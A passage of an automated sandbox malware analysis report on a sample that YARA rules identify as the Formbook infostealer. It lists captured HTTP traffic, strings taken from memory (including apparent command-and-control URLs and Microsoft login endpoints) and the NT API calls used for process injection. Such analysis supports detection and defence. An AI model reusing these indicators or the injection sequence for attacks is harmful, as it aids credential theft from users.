64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 
74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:11 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 
74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:12:17 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:12:20 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:12:22 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:12:25 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:12:30 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1566 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:12:33 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1566 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:12:36 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1566 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:12:38 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1714 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close
            Source: indent PWS-020199.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: indent PWS-020199.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: indent PWS-020199.exe String found in binary or memory: http://ocsp.comodoca.com0
            Source: indent PWS-020199.exe String found in binary or memory: http://tempuri.org/DataSet1.xsd
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
            Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2907687194.0000000005734000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.eylmpwjot.store
            Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2907687194.0000000005734000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.eylmpwjot.store/3mcu/
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
            Source: netiougc.exe, 00000007.00000002.2907131071.0000000004738000.00000004.10000000.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2906287952.0000000003998000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.searchvity.com/
            Source: netiougc.exe, 00000007.00000002.2907131071.0000000004738000.00000004.10000000.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2906287952.0000000003998000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.searchvity.com/?dn=
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
            Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netiougc.exe, 00000007.00000003.2203335794.0000000008185000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: indent PWS-020199.exe String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: firefox.exe, 0000000A.00000002.2311704116.0000000002776000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.mareomnia.com/ya74/?dBOL8fg=

            E-Banking Fraud

            Source: Yara match File source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_0042B3B3 NtClose,2_2_0042B3B3
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2B60 NtClose,LdrInitializeThunk,2_2_014F2B60
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_014F2DF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_014F2C70
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F35C0 NtCreateMutant,LdrInitializeThunk,2_2_014F35C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F4340 NtSetContextThread,2_2_014F4340
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F4650 NtSuspendThread,2_2_014F4650
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2BE0 NtQueryValueKey,2_2_014F2BE0
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2BF0 NtAllocateVirtualMemory,2_2_014F2BF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2B80 NtQueryInformationFile,2_2_014F2B80
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2BA0 NtEnumerateValueKey,2_2_014F2BA0
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2AD0 NtReadFile,2_2_014F2AD0
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2AF0 NtWriteFile,2_2_014F2AF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2AB0 NtWaitForSingleObject,2_2_014F2AB0
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2D00 NtSetInformationFile,2_2_014F2D00
            Source: C:\Users\user\Desktop\indent PWS-020199.exe Code function: 2_2_014F2D10 NtMapViewOfSection,2_2_014F2D10
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2D30 NtUnmapViewOfSection,2_2_014F2D30
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2DD0 NtDelayExecution,2_2_014F2DD0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2DB0 NtEnumerateKey,2_2_014F2DB0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2C60 NtCreateKey,2_2_014F2C60
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2C00 NtQueryInformationProcess,2_2_014F2C00
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2CC0 NtQueryVirtualMemory,2_2_014F2CC0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2CF0 NtOpenProcess,2_2_014F2CF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2CA0 NtQueryInformationToken,2_2_014F2CA0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2F60 NtCreateProcessEx,2_2_014F2F60
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2F30 NtCreateSection,2_2_014F2F30
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2FE0 NtCreateFile,2_2_014F2FE0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2F90 NtProtectVirtualMemory,2_2_014F2F90
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2FA0 NtQuerySection,2_2_014F2FA0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2FB0 NtResumeThread,2_2_014F2FB0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2E30 NtWriteVirtualMemory,2_2_014F2E30
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2EE0 NtQueueApcThread,2_2_014F2EE0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2E80 NtReadVirtualMemory,2_2_014F2E80
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2EA0 NtAdjustPrivilegesToken,2_2_014F2EA0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F3010 NtOpenDirectoryObject,2_2_014F3010
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F3090 NtSetValueKey,2_2_014F3090
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F39B0 NtGetContextThread,2_2_014F39B0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F3D70 NtOpenThread,2_2_014F3D70
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F3D10 NtOpenProcessToken,2_2_014F3D10
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A24340 NtSetContextThread,LdrInitializeThunk,7_2_03A24340
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A24650 NtSuspendThread,LdrInitializeThunk,7_2_03A24650
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03A22BA0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03A22BE0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03A22BF0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22B60 NtClose,LdrInitializeThunk,7_2_03A22B60
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22AF0 NtWriteFile,LdrInitializeThunk,7_2_03A22AF0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22AD0 NtReadFile,LdrInitializeThunk,7_2_03A22AD0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22FB0 NtResumeThread,LdrInitializeThunk,7_2_03A22FB0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22FE0 NtCreateFile,LdrInitializeThunk,7_2_03A22FE0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22F30 NtCreateSection,LdrInitializeThunk,7_2_03A22F30
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03A22E80
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03A22EE0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03A22DF0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22DD0 NtDelayExecution,LdrInitializeThunk,7_2_03A22DD0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03A22D30
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03A22D10
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03A22CA0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22C60 NtCreateKey,LdrInitializeThunk,7_2_03A22C60
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03A22C70
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A235C0 NtCreateMutant,LdrInitializeThunk,7_2_03A235C0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A239B0 NtGetContextThread,LdrInitializeThunk,7_2_03A239B0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22B80 NtQueryInformationFile,7_2_03A22B80
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22AB0 NtWaitForSingleObject,7_2_03A22AB0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22FA0 NtQuerySection,7_2_03A22FA0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22F90 NtProtectVirtualMemory,7_2_03A22F90
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22F60 NtCreateProcessEx,7_2_03A22F60
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22EA0 NtAdjustPrivilegesToken,7_2_03A22EA0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22E30 NtWriteVirtualMemory,7_2_03A22E30
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22DB0 NtEnumerateKey,7_2_03A22DB0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22D00 NtSetInformationFile,7_2_03A22D00
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22CF0 NtOpenProcess,7_2_03A22CF0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22CC0 NtQueryVirtualMemory,7_2_03A22CC0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A22C00 NtQueryInformationProcess,7_2_03A22C00
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A23090 NtSetValueKey,7_2_03A23090
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A23010 NtOpenDirectoryObject,7_2_03A23010
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A23D10 NtOpenProcessToken,7_2_03A23D10
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03A23D70 NtOpenThread,7_2_03A23D70
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03238240 NtAllocateVirtualMemory,7_2_03238240
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03238060 NtDeleteFile,7_2_03238060
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_032380F0 NtClose,7_2_032380F0
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03237F80 NtReadFile,7_2_03237F80
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03237E20 NtCreateFile,7_2_03237E20
